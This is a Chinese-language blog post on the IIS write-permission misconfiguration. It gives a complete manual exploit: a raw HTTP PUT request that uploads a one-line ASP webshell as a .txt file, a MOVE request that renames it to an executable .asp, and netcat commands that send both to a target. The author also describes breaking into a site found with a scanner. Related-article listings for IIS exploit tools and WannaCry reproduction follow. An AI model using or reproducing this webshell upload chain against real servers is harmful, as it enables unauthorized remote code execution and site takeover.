IIS写权限漏洞原理&利用工具手动版

最新推荐文章于 2024-08-07 22:45:32 发布
最新推荐文章于 2024-08-07 22:45:32 发布
阅读量2.1k 收藏
点赞数
文章标签: iis 工具 测试 虚拟机 exe 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maxiaoqiang1/article/details/6165855
版权
本文介绍了IIS写权限漏洞的原理和手工利用方法,包括PUT和MOVE指令来上传和改后缀,以实现远程代码执行。通过手动操作,可以理解漏洞利用过程,并在没有现成工具时自行创建。
摘要由CSDN通过智能技术生成

很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug。八百年遇不到一会,结果前几天不幸碰上了。
用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜JSKY用的参数一定是“/”)。

还好,最后搞进去把人家的站恢复了,真惊险。还义务帮他补漏洞,删后门......

其中用到了IIS写权限利用工具,桂林老兵版的没带身上,网上下到了zwell版的,结果没成功,最后自己动手写了一个手动版的,看来还是“自己动手,丰衣足食”哇,呼呼。

分别保存下面两个TXT文件。

//PUT.TXT
PUT /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Content-Length: 24

<%Execute request(’#’)%>

//MOVE.TXT
MOVE /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp


(别忘了上面有两下回车)
然后在CMD分别输入以下命令即可:

c:/>nc www.xxx.com 80<PUT.TXT
c:/>nc www.xxx.com 80<MOVE.TXT

然后就得到了地址为http://www.xxx.com/zerosoul.asp的一句话。

通过上面文本的内容,我们可以轻易看出IIS写权限是怎么利用的:

1.使用PUT方式上传后缀名为TXT的一句话马(不能直接上传IIS能解析的文件)。

最低0.47元/天 解锁文章
maxiaoqiang1
关注
【实战系列3】IIS PUT文件上传漏洞GetShell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-10 2508
IIS(Internet Information Services)PUT文件上传漏洞是一种安全漏洞,影响微软的IIS服务器。它允许攻击者通过HTTP PUT请求上传任意文件到服务器上,从而可能导致恶意文件的上传和执行,可能引发远程代码执行攻击,导致服务器被攻陷。
iis权限利用工具
06-29
检查windows服务器的设置漏洞,仅针对IIS
漏洞复现】IIS中间件漏洞
最新发布
qq_48368964的博客
08-07 1121
HTTP.SYS远程代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的Windows系统发送 特殊设计的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,成功利⽤此漏洞的攻击者可以在系统 帐户的上下⽂中执⾏任意代码。主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这个漏洞
iis权限利用工具
11-14
iis权限利用工具,老兵的作品,用着还行吧
IIS权限利用工具
03-07
IIS权限利用工具 网络攻防信息安全 是的
IIS权限利用工具.rar
10-14
IIS权限利用工具 漏洞入侵工具
Web应用安全:IIS禁止目录列出配置.pptx
06-20
目录遍历攻击是一种常见的Web安全漏洞利用方式,攻击者尝试通过URL路径遍历服务器的文件系统,以获取未经授权的访问权限。他们可能会试图通过在URL中插入“../”这样的路径遍历序列,逐级回溯到上一级目录,寻找隐藏...
IIS6.0下配置MVC项目
09-26
1. **打开IIS管理器**:通过“控制面板” -> “管理工具” -> “Internet信息服务(IIS)管理器”来启动IIS管理界面。在这里,你可以看到服务器上的所有网站和应用程序池。 2. **配置默认网站属性**:在IIS管理器中...
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
IIS权限漏洞工具
10-19
IIS权限漏洞工具 IIS权限漏洞工具
IIS权限工具
04-01
IISwrite .IISPutScan
iis 漏洞扫描和利用工具
03-06
iis 漏洞扫描和利用工具,相当好用。多种漏洞利用方式可以选择,可以试试看哦!
Iis权限漏洞认识
weixin_34313182的博客
10-13 186
Iis权限漏洞是由于iis的网站主目录权限设置不当造成的,严格来说不属于iis漏洞。网站主目录设置可权限,可直接往服务器文件,漏洞威胁级别较高。 漏洞成可利用的条件 1、 网站主目录权限允许入和脚本资源访问。如果只有权限利用时只能上传txt文件,使用move方法将txt文件改正可执行脚本,需要脚本资源访问权限。 2、 WebDAV服务器扩...
IIS 漏洞工具解析
明哥哥知识分享
09-16 2224
1. 概述通过学习文档内容。 熟悉并掌握 IIS 漏洞利用工具利用方法,了解具体的功能内 容,亲自实践操作,并根据课程需求完成相关任务。 2. 工具功能说明 IIS 漏洞利用工具是由桂林老兵的一款漏洞利用工具,专门针对 IIS 漏洞。 接下来我们具体介绍一下相关的使用。 2.1.第一部分 数据包格式 该功能模块默认的数据包传输方法有 7 种,分别是: OPTIONS 返回服务器的各种信息 PUT 生成上传文件数据包的。 POST 用来提交表单 MOVE 是改名数据包。 COPY 是复制数
简析IIS权限
kuxing100的专栏
02-18 640
最近在搞网站,不小心把几个站给搞垮了,具体就不说了,过程也无非是扫描,我用的方法是IIS权限    跟平常的注入也不一样,大家如果没有找到注入点的话,可以试试IIS权限,             下面的文章是网上转载来的,大家了解一下过程 //上个月给黑手投去了,人家既然没有发表,我就发出来吧,毕竟文章的原创内容太少,技术含量也没有多高。  最近对IIS的一些安全设置做了下
IIS中间件漏洞----DotNetScan 工具
arissa666的博客
11-03 414
用DotNetScan 工具把目标网站IP,端口填下。找到IIS的网站后就可进行操作上传。也可以使用IISPutScanner工具
IIS漏洞详析:从IIS6.0到IIS7.5安全风险深度解读
IIS漏洞全解析是一篇详尽探讨不同本的Internet Information Services (IIS)中存在的安全漏洞的文章。主要关注的是IIS 6.0和6.5以及IIS 7.0、7.5和Nginx 0.8.37等本。以下是关键知识点的总结: 1. **IIS 6.0漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值